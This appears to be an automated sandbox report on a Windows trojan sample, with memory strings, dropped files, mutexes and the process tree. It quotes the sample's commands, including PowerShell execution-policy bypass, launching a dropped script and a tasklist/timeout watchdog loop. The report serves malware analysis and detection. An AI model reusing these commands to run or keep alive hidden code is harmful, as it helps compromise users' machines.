Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://dump.mgr.xzdesktop.cqttech.com/api/DumpInfoStat%s_%d-%02d-%02d.log
Source: powershell.exe, 0000000E.00000002.85562793412.00000000061D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.85557142787.00000000058FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000E.00000002.85557142787.0000000005171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.85557142787.00000000058FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: CnjMEmbChO.exe, 00000000.00000003.84736489577.0000000000A58000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84736836758.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000353A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000000E.00000002.85555320283.0000000003454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 0000000E.00000002.85557142787.0000000005171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.flash.cn/config/getCdnValue?key=zero_dayzero_day
Source: powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000330B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flash.2144.com/cdm/icons/chn100.png
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000330B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flash.2144.com/cdm/icons/ten100.png
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.2144.cn/about/duty.htm
Source: powershell.exe, 0000000E.00000002.85573109453.0000000008B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
Source: powershell.exe, 0000000E.00000002.85562793412.00000000061D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000E.00000002.85555320283.0000000003454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://update-xztodolist.cqttech.com/api/v1/update/check
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://update-xztodolist.cqttech.com/api/v1/update/checkXZDesktopCalendarCXZUpdateModule
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flash.cn/
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flash.cn/cdm/
Source: RuntimeBrokers.exe, 00000004.00000003.85522764126.0000000005341000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_4c7d1d4e-4
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess Stats: CPU usage > 6%
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00404FAA0_2_00404FAA
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_0041206B0_2_0041206B
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_0041022D0_2_0041022D
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00411F910_2_00411F91
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\backup.exe 9E65D0E8A1BE49EDE20AD53EE1CF57696C99A28D1B058A185818B58B7FD83F66
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: String function: 0040243B appears 37 times
Source: flashcenter_pp_ax_install_cn.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: flashcenter_pp_ax_install_cn.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
Source: CnjMEmbChO.exe, 00000000.00000003.84703495774.0000000002591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameV vs CnjMEmbChO.exe
Source: CnjMEmbChO.exe, 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameV vs CnjMEmbChO.exe
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamensdksetupJ vs CnjMEmbChO.exe
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXZCalendarServer.exe* vs CnjMEmbChO.exe
Source: CnjMEmbChO.exe, 00000000.00000003.84733438844.000000000330B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAdobe Download ManagerN vs CnjMEmbChO.exe
Source: CnjMEmbChO.exe, 00000000.00000002.84739652139.00000000004BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs CnjMEmbChO.exe
Source: CnjMEmbChO.exeBinary or memory string: OriginalFilenameV vs CnjMEmbChO.exe
Source: CnjMEmbChO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal88.troj.evad.winEXE@101/45@0/1
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
Source: C:\Users\user\Desktop\CnjMEmbChO.exeFile created: C:\Users\Public\BiliteJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:564:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12. 5
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:304:WilStaging_02
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile created: C:\Users\user\AppData\Local\Temp\monitor.batJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: CnjMEmbChO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;RUNTIMEBROKERS.EXE&apos;
Source: C:\Users\user\Desktop\CnjMEmbChO.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: CnjMEmbChO.exeReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\CnjMEmbChO.exeFile read: C:\Users\user\Desktop\CnjMEmbChO.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\CnjMEmbChO.exe "C:\Users\user\Desktop\CnjMEmbChO.exe"
Source: C:\Users\user\Desktop\CnjMEmbChO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
